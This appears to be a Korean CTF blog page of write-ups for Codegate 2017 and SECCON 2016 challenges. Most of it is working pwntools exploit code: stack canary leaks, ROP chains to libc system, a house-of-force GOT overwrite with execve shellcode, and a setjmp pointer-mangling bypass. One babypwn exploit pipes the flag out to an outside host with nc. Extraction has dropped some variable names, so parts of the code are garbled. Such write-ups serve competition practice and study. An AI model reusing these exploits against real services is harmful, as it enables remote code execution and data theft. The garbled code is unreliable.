codegate writeup.pdf


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import angr
import claripy
 
fgets           = 0x00000000004007D5
find           = (0x404fda,0x0404FAB,0x404FBC,0x404FDA,)
avoid          = tuple([0x4000060,0x4007ef,0x400818,0x400838,0x400861,0x400890,0x4008b9,0x4008e2,0x40090b,0x400934,0x400977,0x4009a0,0x4009c9,0x4009f2,0x400a1b,0x400a47,0x400a6c,0x400a95,0x400abb,0x400ae0,0x400b09,0x400b3f,0x400b68,0x400ba4,0x400bd6,0x400bff,0x400c31,0x400c5d,0x400c82,0x400cab,0x400cd0,0x400cf5,0x400d1b,0x400d40,0x400d69,0x400d92,0x400db2,0x400dd7,0x400e00,0x400e26,0x400e52,0x400e7b,0x400eb8,0x400edd,0x400f06,0x400f2f,0x400f58,0x400f78,0x400fa1,0x400fd0,0x400ff5,0x40101b,0x40104b,0x401070,0x401099,0x4010c2,0x4010e2,0x40110b,0x401134,0x40115d,0x401186,0x4011c2,0x4011eb,0x40121b,0x401244,0x40126d,0x401296,0x4012bf,0x4012e8,0x40131e,0x401347,0x401373,0x40139c,0x4013c5,0x4013e5,0x40140e,0x401437,0x401460,0x401489,0x4014b2,0x4014db,0x401504,0x40152d,0x401556,0x40157f,0x4015a8,0x4015d1,0x401600,0x401629,0x401652,0x40167b,0x4016a4,0x4016d3,0x4016fc,0x401725,0x40177b,0x4017a4,0x4017cc,0x4017f5,0x40181e,0x401854,0x40187d,0x4018b3,0x4018dc,0x401905,0x40192e,0x401957,0x401980,0x4019a9,0x4019d2,0x4019fb,0x401a24,0x401a53,0x401a7c,0x401aac,0x401ad5,0x401afe,0x401b2d,0x401b56,0x401b7f,0x401ba4,0x401bcd,0x401bf5,0x401c2b,0x401c5a,0x401c83,0x401cac,0x401cd5,0x401cfe,0x401d23,0x401d49,0x401d6e,0x401d97,0x401dd3,0x401dfc,0x401e25,0x401e4a,0x401e70,0x401e95,0x401eba,0x401ee3,0x401f12,0x401f3b,0x401f64,0x401f8d,0x401fb6,0x401fdf,0x402008,0x402031,0x40205a,0x402083,0x4020a8,0x4020cd,0x4020f3,0x402118,0x402141,0x40216a,0x4021a0,0x4021c9,0x4021ff,0x402224,0x40225d,0x402283,0x4022a8,0x4022d1,0x4022fa,0x402323,0x40234c,0x402375,0x40239e,0x4023c3,0x4023e8,0x40240d,0x402433,0x402458,0x40248e,0x4024c0,0x4024fc,0x402525,0x40254a,0x40256f,0x402595,0x4025ba,0x4025e3,0x402640,0x402672,0x402697,0x4026c6,0x4026ef,0x40271f,0x402748,0x40277e,0x4027a7,0x4027cd,0x4027f2,0x40281b,0x402844,0x40286d,0x402896,0x4028bf,0x4028f1,0x40291a,0x402943,0x402968,0x40298d,0x4029b6,0x4029db,0x402a15,0x402a3a,0x402a69,0x402a92,0x402abb,0x402af1,0x402b1a,0x402b43,0x402b79,0x402b9e,0x402bc7,0x402bf0,0x402c15,0x402c3a,0x402c69,0x402c92,0x402cb7,0x402cdd,0x402d02,0x402d2b,0x402d61,0x402d8a,0x402db3,0x402dd8,0x402e01,0x402e2f,0x402e58,0x402e8a,0x402eaf,0x402ede,0x402f03,0x402f2c,0x402f55,0x402f90,0x402fb6,0x402fe8,0x403011,0x40303a,0x40305a,0x403083,0x4030ac,0x4030d5,0x4030fe,0x40311e,0x403154,0x40317d,0x40319d,0x4031c6,0x4031ef,0x403218,0x403241,0x40326a,0x403293,0x4032da,0x403307,0x403330,0x403359,0x403395,0x4033cb,0x4033eb,0x403414,0x40343d,0x403466,0x40348f,0x4034b8,0x4034e1,0x403501,0x40352a,0x403559,0x403582,0x4035ab,0x4035d4,0x40360a,0x40362a,0x403660,0x403689,0x4036b2,0x403702,0x40372b,0x403754,0x40378a,0x4037c0,0x4037e9,0x403812,0x40383b,0x403864,0x40388d,0x4038c3,0x4038f9,0x40392f,0x403958,0x40397d,0x4039a3,0x4039c8,0x4039f1,0x403a1a,0x403a43,0x403a6c,0x403a91,0x403ac0,0x403ae5,0x403b14,0x403b3d,0x403b66,0x403b8f,0x403bb8,0x403be1,0x403c06,0x403c2b,0x403c5a,0x403c83,0x403cac,0x403ce2,0x403d0b,0x403d34,0x403d5d,0x403d82,0x403da7,0x403dd6,0x403dff,0x403e28,0x403e51,0x403e90,0x403ed1,0x403f07,0x403f30,0x403f66,0x403f8b,0x403fb0,0x403fd6,0x403ffb,0x404024,0x40405a,0x404083,0x4040ac,0x4040d1,0x4040f6,0x40411c,0x404141,0x40416a,0x404193,0x4041c9,0x4041f2,0x404218,0x40423d,0x404266,0x40428f,0x4042b8,0x4042e1,0x40430a,0x40432f,0x404358,0x40437d,0x4043a2,0x4043d4,0x4043fa,0x40441f,0x404448,0x404471,0x40449a,0x4044c3,0x4044ec,0x404511,0x40453a,0x40455f,0x404584,0x4045ad,0x4045d2,0x4045f8,0x40461d,0x404646,0x40466f,0x404698,0x4046c1,0x4046ea,0x40470f,0x404738,0x40475d,0x404782,0x4047ab,0x4047d0,0x4047f5,0x40481a,0x404840,0x404865,0x40488e,0x4048b7,0x4048dc,0x404901,0x404930,0x404959,0x404982,0x4049ab,0x4049d4,0x4049fd,0x404a1d,0x404a46,0x404a6f,0x404a98,0x404ac1,0x404aea,0x404b0a,0x404b33,0x404b5c,0x404b85,0x404bae,0x404bd7,0x404c00,0x404c29,0x404c6c,0x404c95,0x404cbe,0x404ce7,0x404d10,0x404d39,0x404d6f,0x404d98,0x404dc1,0x404dea,0x404e13,0x404e3c,0x404e61,0x404e90,0x404eb9,0x404ee2,0x404f0b,0x404f30,0x404f68,0x404f9])
 
= angr.Project('/tmp/angrybird')
 
= p.factory.blank_state(addr = fgets )
serial = s.se.BVS("flag"24*8)
ebp = 0x606f00
s.memory.store(ebp-0x70, claripy.BVS(0x606018,64))
s.memory.store(ebp-0x68, claripy.BVS(0x606020,64))
s.memory.store(ebp-0x60, claripy.BVS(0x606028,64))
s.memory.store(ebp-0x58, claripy.BVS(0x606038,64))
s.memory.store(ebp-0x50, serial)
s.regs.rbp = ebp
 
pg = p.factory.path_group(s)
pg.explore(find = find, avoid=avoid)
 
 
pg
print pg.found[0].state.se.any_str(serial).strip("\x00")
cs


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *
 
= ELF('/root/codegate/babypwn')
#l = ELF('/lib/i386-linux-gnu/libc-2.23.so')
= ELF('/root/codegate/92'# libcdb.com
= remote('110.10.212.130'8889)
#s = remote('0',8181)
 
print s.recvuntil(' >')
s.sendline('1')
print s.recvuntil(':')
s.send('a'*41)
print s.recvuntil('a'*41)
canary = u32('\x00'+s.recv(4))
print hex(canary)
 
 
s.sendline('1')
print s.recvuntil(':')
pppr = 0x8048B83
 
c_send = 0x080488B1
c_recv = 0x08048907
send = 0x08048700
rop = '1'*0xc
#rop += e.symbols['mend'] + p32(pppr) + p32(
rop += p32( c_send ) + p32( pppr+2 ) + p32( e.got['send'] )
rop += p32( c_recv ) + p32( pppr+1 ) + p32( e.got['send'] ) + p32(40)
rop += p32( send ) + 'AAAA' + p32( e.got['send'+ 4 )
 
s.send('a'*40+p32(canary)+rop)
s.sendline('3')
print s.recvuntil('Select menu > ')
leak_libc = u32(s.recv(4))
system = leak_libc + (l.symbols['system'- l.symbols['send'])
print 'LIBC : %x' % leak_libc
 
cmd = 'cat flag|nc cutejinu.xyz 4999;'
s.send( p32(system) + cmd )#'ls|nc cutejinu.xyz 4999;' )
 
s.interactive()
cs


1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
 
= remote('110.10.212.138'19091)
s.recvuntil('Input >')
sc = "TjBfbTRuX2M0bDFfYWc0aW5fWTNzdDNyZDR5OigA"
s.sendline(sc)
s.recvuntil('[*] USER : ')
print s.recvuntil('Input')
s.sendline('TjBfbTRuX2M0bDFfYWc0aW5fWTNzdDNyZDR5OigA')
print s.recvuntil('Input')
s.sendline('TjBfbTRuX2M0bDFfYWc0aW5fWTNzdDNyZDR5OigA==')
s.sendline('"Y2F0IGZsYWc="')
s.interactive()%
cs


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
from pwn import *
import angr
import os
import urllib2
 
def a(c):
    path = '/tmp/n/prob%d'%c
    s = process('/bin/sh')
 
    e = ELF(path)
    st = '0x%x' % list(e.search('Good'))[0]
    s.sendline( "objdump --disassemble %s|grep %s|awk '{print $1}'" % (path, st) )
    res = s.recvline().strip()
    find = int( res.replace(':','') , 16 )
 
    s.sendline("objdump --disassemble %s|grep \"exit@plt>\"|grep call|awk '{print $1}';echo END" % path)
    tmp = s.recvuntil('END').replace(':','').strip().replace('\nEND','').split('\n')
    avoid = [find+12,]
    for t in tmp:
        avoid.append(int(t,16))
 
    avoid = tuple(avoid)
    # print find
    # print avoid
    # avoid = (0x0000400DD2,0x0000400DFB)
 
    project = angr.Project(path, load_options={'auto_load_libs':False})
    argv1 = angr.claripy.BVS("argv1",100*8)
    initial_state = project.factory.path(args=[path,argv1])
    pg = project.factory.path_group(initial_state)
    pg.explore(avoid=avoid,find=find)
    found = pg.found[0]
    solution = found.state.se.any_str(argv1)
    solution = solution[:solution.find("\x00")]
    return solution
 
for i in range(1,102):
# for i in [6,23,31,41,54,72,76,85,86,99,100]:
    try:
        print i
        t = urllib2.quote(a(i))
        print t
        os.system("""curl 'http://110.10.212.131:8777/auth.php' -H 'Cookie: PHPSESSID=ufccld9ve2su5t7pksvdud4215' -H 'Origin: http://110.10.212.131:8777' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.8' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Cache-Control: max-age=0' -H 'Referer: http://110.10.212.131:8777/' -H 'Connection: keep-alive' --data 'prob=%d&key=%s' --compressed"""%(i,t))
    except:
        print "ERROR"
cs


codegate writeup.pdf


'CTF' 카테고리의 다른 글

SECCON_2016 logger  (0) 2016.12.14
SECCON_2016 cheer  (0) 2016.12.11
SECCON_2016 checker  (0) 2016.12.11
SECCON_2016 jmper  (0) 2016.12.11

top chunk를 ffffffffffffffff로 덮고 다음 malloc할때 got부분을 할당받으면 된다

1
2
3
4
0x00400000         0x00402000         r-xp    /root/logger
0x00601000         0x00602000         r-xp    /root/logger
0x00602000         0x00603000         rwxp    /root/logger
0x00603000         0x00624000         rwxp    [heap]
cs

heap의 권한이 rwxp이기때문에 힙에다 쉘코드를 넣으면 된다


2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
from pwn import *
 
elf = "/root/pwn/seccon/logger"
#lib32 = "/root/pwn/seccon/libc-2.19.so-c4dc1270c1449536ab2efbbe7053231f1a776368"
#lib64 = "/lib/x86_64-linux-gnu/libc-2.21.so"
 
# s = process(elf)
# s1 = process(elf)
= remote('logger.pwn.seccon.jp',6565)
s1 = remote('logger.pwn.seccon.jp',6565)
= ELF(elf)
#l = ELF(lib32)
 
DEBUG = 0
if DEBUG > 0:
    print "PID : %d" % util.proc.pidof(s)[0]
    if DEBUG == 2:
        context.log_level = 'debug'
 
uid = str(time.time())
#uid = "debug"
 
s.recvuntil("exit")
s.sendline("1")
s.sendline(uid)
s.sendline(uid)
s.recvuntil("exit")
print "[*] id : %s" % uid
 
s1.sendline("1")
s1.sendline(uid)
s1.sendline(uid)
 
def read(ss):
    ss.sendline("1")
    return ss.recvuntil("exit").split("1. Read log")[0]
def append(ss,size,data):
    ss.sendline("2")
    ss.recvuntil("128byte")
    ss.sendline(str(size))
    ss.sendline(data)
    ss.recvuntil("exit")
def leak(ss):
    ss.sendline("3")
    ss.recvuntil("filename: ")
    ss.recv(32)
    t = ss.recvuntil("=")[:-1]
    t += ("\x00" * (8-len(t)))
    ss.recvuntil("exit")
    return t
 
#buf = malloc(file_size) leak
heap_addr = u64( leak(s) )
print "[*] LEAK_HEAP : %x" % heap_addr
 
#house of force
#topchunk = ffffffffffffffff
append(s1,32,"\xff"*32)
read(s)
 
offset = 0x602050 - 0x28 - heap_addr# - (32+16)
print "[*] offset : %d" % offset
#append(s,"%d"%offset,"A")
append(s,"%d"%offset,"")
 
#got Overwrite
s.sendline("2")
s.sendline("128")
#http://shell-storm.org/shellcode/files/shellcode-806.php
sc = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
sc = "\x90"*(0x40-len(sc)) + sc
sc += p64(0x602080)
s.sendline(sc)
s.interactive()
cs




'CTF' 카테고리의 다른 글

codegate 2017  (0) 2017.02.11
SECCON_2016 cheer  (0) 2016.12.11
SECCON_2016 checker  (0) 2016.12.11
SECCON_2016 jmper  (0) 2016.12.11
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from pwn import *
 
elf = "/root/pwn/seccon/cheer_msg"
lib32 = "/root/pwn/seccon/libc-2.19.so-c4dc1270c1449536ab2efbbe7053231f1a776368"
#lib64 = "/lib/x86_64-linux-gnu/libc-2.21.so"
 
#s = process(elf)
= remote('cheermsg.pwn.seccon.jp',30527)
= ELF(elf)
= ELF(lib32)
 
DEBUG = 1
if DEBUG == 2:
    context.log_level = 'debug'
 
print s.recv()
s.sendline("-142")
print s.recv()
ppppr = 0x80487AC
main = 0x080484B0
offset = l.symbols['printf'- l.symbols['system']
#sh = p32(0x08048627) + p32(0x804a090) + p32(0x804a090-1) + p32(100)
#sh += p32(0x080485CA) + p32(ppppr + 1) + p32(0x804A020) + p32(20)
#sh = p32(0x0804863C) + p32(0x0804A065)
#sh = "A"*80+"PPPR12345678asdfzxcv" + "\n"
sh = p32(e.symbols['printf']) + p32(main) + p32(e.got['printf'])
raw_input()
 
#s.send("A"*0x30+shellcode)
s.sendline    ( "A"*0x10 + 
            sh)
print s.recvuntil("Message : ")
print s.recvuntil("\n")
leak = u32(s.recv(4))
 
print "[*] LEAK : %x" % leak
 
print s.recvuntil("Message Length >>")
s.sendline("-142")
 
sh = p32(leak - offset) + "AAAA" + p32(leak - (l.symbols['printf'- list(l.search("sh\x00"))[0]))
 
s.sendline( "A"*0x10 + sh)
s.interactive()
cs




'CTF' 카테고리의 다른 글

codegate 2017  (0) 2017.02.11
SECCON_2016 logger  (0) 2016.12.14
SECCON_2016 checker  (0) 2016.12.11
SECCON_2016 jmper  (0) 2016.12.11

SSP에서 stack smashing detected 뒤에 나오는 argv[0]포인터를 FLAG 버퍼로 변조하면 된다

1
2
3
4
5
6
7
8
9
10
11
12
sc = "kk\n"
sc +="A"*384+"\n"
sc +="A"*383+"\n"
sc +="A"*382+"\n"
sc +="A"*381+"\n"
sc +="A"*380+"\n"
sc +="A"*379+"\n"
sc +="A"*378+"\n"
sc +="A"*377+"\n"
sc +="A"*376+"\xc0\x10\x60\x00\n"
sc +="yes\na\n"
print sc
cs


'CTF' 카테고리의 다른 글

codegate 2017  (0) 2017.02.11
SECCON_2016 logger  (0) 2016.12.14
SECCON_2016 cheer  (0) 2016.12.11
SECCON_2016 jmper  (0) 2016.12.11

[*] '/root/pwn/seccon/jmper'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE


[_]FULL RELRO가 걸려있어서 got를 덮다 프로그램이 죽는바람에 놀랐다


00 : BUF

08 : NUM
10 : NAME
18
20
28 : *MEMO

 i = 0; i <= 32; ++i
1byte overflow가 나고 NAME에서 MEMO의 1byte를 조작후 MEMO포인터를 가르키게한뒤 그 포인터를 수정하면 원하는곳에 있는 데이터를 수정 가능하다

MEMO포인터를 변조해 LIBC, _setjmp할때 쓰인 XOR 키값을 빼오고 _setjmp(jmpbuf)할때 저장된 rsp,rip를 변조해서 원샷가젯으로 가게하면 된다
rsp + 0x30 ???인가가 원샷가젯 두번째 인자로 들어가서 그부분이 0을 가르키게 rsp를 조작해야된다

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
from pwn import *
 
elf = "/root/pwn/seccon/jmper"
lib64 = "/root/pwn/seccon/libc-2.19.so-8674307c6c294e2f710def8c57925a50e60ee69e"
#lib64 = "/lib/x86_64-linux-gnu/libc-2.21.so"
 
#s = process(elf)
= remote('jmper.pwn.seccon.jp',5656)
= ELF(elf)
= ELF(lib64)
print s.recvuntil("Bye :)")
 
DEBUG = 1
if DEBUG == 2:
    context.log_level = 'debug'
 
def ROR(data, shift, size=64):
    shift %= size
    body = data >> shift
    remains = (data << (size - shift)) - (body << size)
    return (body + remains)
def ROL(data, shift, size=64):
    shift %= size
    remains = data >> (size - shift)
    body = (data << shift) - (remains << size )
    return (body + remains)
 
def add():
    s.sendline("1")
    print s.recvuntil("Bye :)")
 
def name(id,t):
    s.sendline("2")
    print s.recv()
    s.sendline(str(id))
    print s.recv()
    s.send(t)
    print s.recvuntil("Bye :)")
 
def memo(id,t):
    s.sendline("3")
    print s.recv()
    s.sendline(str(id))
    print s.recv()
    s.send(t)
    print s.recvuntil("Bye :)")
 
def v_name(id):
    s.sendline("4")
    print s.recv()
    s.sendline(str(id))
    print s.recvuntil("ID:")
    return s.recv()
 
def v_memo(id):
    s.sendline("5")
    print s.recv()
    s.sendline(str(id))
    return s.recvuntil("1.")[:-2]
add()
 
memo(0,"A"*0x1f+"B\n")
leak_heap = v_memo(0).split("B")[1]
leak_heap += "\x00"*(8-len(leak_heap))
leak_heap = u64(leak_heap)
 
print "[*] LEAK HEAP : %x" % leak_heap
if leak_heap&0xff < 0x20:
    print "FAIL"
    exit()
memo( 0"A"*0x20 + chr( (leak_heap&0xff- 0x18 ) )
name( 0,p64(e.got['printf'])+"\n")
leak_libc = u64(v_name(0)[:6]+"\x00\x00")
print "[*] LIBC LEAK : %x" % leak_libc
 
add()
 
memo(1,"A"*0x1f+"B\n")
leak_heap = v_memo(1).split("B")[1]
leak_heap += "\x00"*(8-len(leak_heap))
leak_heap = u64(leak_heap)
 
print "[*] LEAK HEAP : %x" % leak_heap
if leak_heap&0xff < 0x20:
    print "FAIL"
    exit()
memo( 1"A"*0x20 + chr( (leak_heap&0xff- 0x18 ) )
 
jmper = leak_heap-0x180
ret = jmper+0x30
ori_ret = 0x00400C31
add()
# print "PID : %d" % util.proc.pidof(s)[0]
# raw_input()
name( 1, p64(ret)+"\n" )
leak_ret = u64(v_name(1)[8:16])
xorkey = ROR(leak_ret,0x11) ^ ori_ret
oneshot = leak_libc - l.symbols['printf'+ 0x04647C
rreett = ROL(oneshot^xorkey,0x11)
rsp = ROL((leak_heap+0x400)^xorkey,0x11)
print "[*] LEAK JMPER_ADDR : %x" % jmper
print "[*] LEAK RET : %x" % leak_ret
print "[*] XOR KEY : %x" % xorkey
print "[*] change,xor : %x,%x" % (oneshot,rreett)
print (p64(rsp)+p64(rreett)).encode('hex')
add()
name (1,p64(rsp)+p64(rreett)+"\n")
s.send("1\n"*27)
s.interactive()
cs


'CTF' 카테고리의 다른 글

codegate 2017  (0) 2017.02.11
SECCON_2016 logger  (0) 2016.12.14
SECCON_2016 cheer  (0) 2016.12.11
SECCON_2016 checker  (0) 2016.12.11

+ Recent posts